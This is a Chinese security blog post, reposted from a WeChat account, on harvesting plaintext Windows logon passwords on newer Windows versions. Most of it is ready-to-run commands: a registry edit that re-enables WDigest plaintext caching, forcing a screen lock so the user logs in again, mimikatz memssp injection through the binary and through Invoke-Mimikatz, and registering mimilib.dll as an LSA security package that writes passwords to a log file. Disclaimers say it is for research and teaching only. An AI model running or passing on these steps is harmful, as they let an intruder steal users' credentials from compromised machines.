获取Windows高版本明文密码

admin

138034
文章

113
评论

2021年4月23日04:22:31评论134 views字数 1456阅读4分51秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

这篇文章来自朋友@Leafer(阿宝)日常测试笔记，文中没有过多介绍其理论知识，大家可以自己去学习了解一下！

0x02 改注册表（mimitaze存在免杀问题）

PASS：需要锁屏等方式

修改成记录明文密码

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改不记录明文密码

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

锁屏

rundll32.exe user32.dll,LockWorkStation

修改完之后使用命令锁屏，接下来等待用户再次登录一次就可以抓到了

0x03 mimikatz插ssp记录密码

PASS：需要锁屏等方式

使用mimikatz的一个功能：

privilege::debug、misc::memssp

修改完之后使用以下命令锁屏，等用户进入后就可以在C:WindowsSystem32mimilsa.log里面存储登录的密码

rundll32.exe user32.dll,LockWorkStation

获取Windows高版本明文密码

0x04 使用Invoke-Mimikatz.ps1

PASS：需要锁屏等方式

Import-Module .Invoke-Mimikatz.ps1  //导入命令Invoke-Mimikatz -Command "misc::memssp"  //不需要重启获取 记录的明文密码存储在这个路径下

凭据收集总结：https://cloud.tencent.com/developer/article/1656546

0x05 复制mimilib.dll+修改注册表

PASS：需要重新启动系统

(1) 在mimikatz中有32和64两个版本，安装包里分别都带有不同位数的mimilib.dll

(2) 将对应版本的dll文件复制到 c:windowssystem32下

(3) 将以下注册表位置中Security Packages的值设置为mimilib.dll

reg add HKLMSYSTEMCurrentControlSetControlLsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f

(4) 等待系统重启后，在c:windowssystem32生成文件kiwissp.log，记录当前用户的明文口令

获取Windows高版本明文密码

渗透技巧-通过CredSSP导出用户的明文口令：https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87CredSSP%E5%AF%BC%E5%87%BA%E7%94%A8%E6%88%B7%E7%9A%84%E6%98%8E%E6%96%87%E5%8F%A3%E4%BB%A4/

本文始发于微信公众号（SecPulse安全脉搏）：获取Windows高版本明文密码

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

获取Windows高版本明文密码

JSONP劫持漏洞

hackmyvm-family

对本校UTS的一次SQL注入渗透及分析

SpringBoot框架挖掘：从 actuator 到内网横向

团队内部漏洞挖掘-sql注入实战案例

某公司的渗透技能考核靶场通关记录

Vulhub-Thinkphp漏洞

vite 漏洞分析

内网基础-Cyberstrikelab靶场lab2

SRC挖掘之接口未授权访问

发表评论

在线咨询

微信